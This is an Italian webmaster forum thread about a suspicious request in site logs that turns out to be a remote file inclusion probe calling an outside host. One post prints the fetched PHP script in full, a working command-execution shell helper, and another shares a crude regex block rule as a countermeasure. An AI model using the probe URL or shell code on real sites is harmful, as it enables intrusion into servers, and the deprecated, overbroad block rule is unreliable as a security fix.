• K
    User Attivo

    Strana chiave di accesso al mo sito

    Ciao, ragazzi.

    Guardando le statistiche ho notato che qualcuno è entrato sul mio sito verso questo url:

    index.php?c=http://www.equipexapadao.com//id.txt?

    Sarà un tentativo di hacking?

    0
  • A
    User Attivo

    beh, se guardi bene il link ti porta a questo script:

    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;

    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;

    non so a voi ma, già vedere le parole "exec", "shell" e "passthru"...
    qualcuno riesce a fare un analisi dello script?

    0
  • wolf.otakar
    Consiglio Direttivo

    Diversi siti, riportano nelle loro statistiche il link segnalato da kru:

    http://www.google.it/search?hl=it&rls=GGGL%2CGGGL%3A2006-39%2CGGGL%3Ait&q=site%3A+www.equipexapadao.com&btnG=Cerca&meta=lr%3Dlang_it

    0
  • K
    User Attivo

    Bene, ragazzi.

    Visto che questi attacchi continuano (non so cosa siano ma certo non mi vogliono regalare bigliettoni da 500 ? :D), sono passato alle contromisure.

    Se avete lo stesso problema, potete implementare qualcosa del genere:

    
 if ( ereg('^(.*)/index.php\?(.*)$', $_SERVER['REQUEST_URI'])) {
     die ('<div align="center"><<br><br><br><br><br><div align="center"><FONT COLOR="4F779F"><strong>La pagina richiesta non esiste o è stata rimossa. </strong>');
 }

    Ciao ciao cracker 😛

    :ciauz:

    0
  • C
    User Attivo

    @kru said:

    Bene, ragazzi.

    Visto che questi attacchi continuano (non so cosa siano ma certo non mi vogliono regalare bigliettoni da 500 ? :D), sono passato alle contromisure.

    Se avete lo stesso problema, potete implementare qualcosa del genere:

    >
 if ( ereg('^(.*)/index.php\?(.*)
 
Bella mossa! :D Però non ho capito dove inserire il codice..., $_SERVER['REQUEST_URI'])) {
     die ('<div align="center"><<br><br><br><br><br><div align="center"><FONT COLOR="4F779F"><strong>La pagina richiesta non esiste o è stata rimossa. </strong>');
 }

>```
 
Ciao ciao cracker :p
 
:ciauz:
 
Bella mossa! :D Però non ho capito dove inserire il codice...
    0
  • K
    User Attivo

    Va inserito sulla home page (index.php), semprechè il tuo sito sia in PHP.

    Lo puoi inserire all'inizio della pagina. Se già hai del codice php presente puoi inserirlo lì. Naturalmente deve essere racchiuso fra <? e ?> 😉

    Il sito in questione è quello in firma?

    0
  • U
    User Attivo

    E' una shell in php, o meglio l'accesso ai comandi di shell, ha presa solo su siti che sono vulnerabili a injection xsl, praticamente quasi nessuno ormai.

    E' simile (un pò meno sofisticato) di quello che avevo riportato come esempio tempo fa...

    "mi chiedo" due cose:

    kru se eri vulnerabile probabilmente non trovavi neanche i log (anche se questi lamer dubito che siano tanto fini) per inserire l'espressione regolare... a quest'ora eri felice di aver avuto dei backup del sito (cosa che spero tu abbia)

    Ai moderatori, l'altra volta appositamente ho evitato di inserire lo script completo e l'indirizzo per evitare che ragazzini credendosi hacker andassero in giro a rompere le scatole a persone che fanno i propri affari.... quindi un pò di sana censura no?

    Io ne ho avuto quasi uno al giorno la settimana scorsa e l'altra, la maggior parte piazzati su hosting gratuiti (poi lamentiamoci che nessuno da più niente gratis ad iniziare dalle mail che sono usate solo per fare gli stupidini) e li ho fatti eliminare contattando gli admin...

    0
  • K
    User Attivo

    @Uno said:

    E' una shell in php, o meglio l'accesso ai comandi di shell, ha presa solo su siti che sono vulnerabili a injection xsl, praticamente quasi nessuno ormai.

    E' simile (un pò meno sofisticato) di quello che avevo riportato come esempio tempo fa...

    Io ne ho avuto quasi uno al giorno la settimana scorsa e l'altra, la maggior parte piazzati su hosting gratuiti (poi lamentiamoci che nessuno da più niente gratis ad iniziare dalle mail che sono usate solo per fare gli stupidini) e li ho fatti eliminare contattando gli admin...

    Grazie per la precisazione 🙂

    kru se eri vulnerabile probabilmente non trovavi neanche i log (anche se questi lamer dubito che siano tanto fini) per inserire l'espressione regolare... a quest'ora eri felice di aver avuto dei backup del sito (cosa che spero tu abbia)

    Direi proprio di sì... Un bel backup lo faccio ad andar male una volta a settimana 😉

    :ciauz:

    0
  • C
    User Attivo

    Il codice sopracitato cosa fà di preciso?

    0
  • K
    User Attivo

    @cosmoweb said:

    Il codice sopracitato cosa fà di preciso?

    Se intendi il mio:

    
 
 if ( ereg('^(.*)/index.php\?(.*)$', $_SERVER['REQUEST_URI'])) {
     die ('<div align="center"><<br><br><br><br><br><div align="center"><FONT COLOR="4F779F"><strong>La pagina richiesta non esiste o è stata rimossa. </strong>');
 }

    reindirizza le chiamate a pagine tipo: dominio/index.php?c=xxxxxxxx, cioè quelle che vengono lanciate con quel tipo di shell, verso una pagina 404.

    0
Effettua l'accesso per rispondere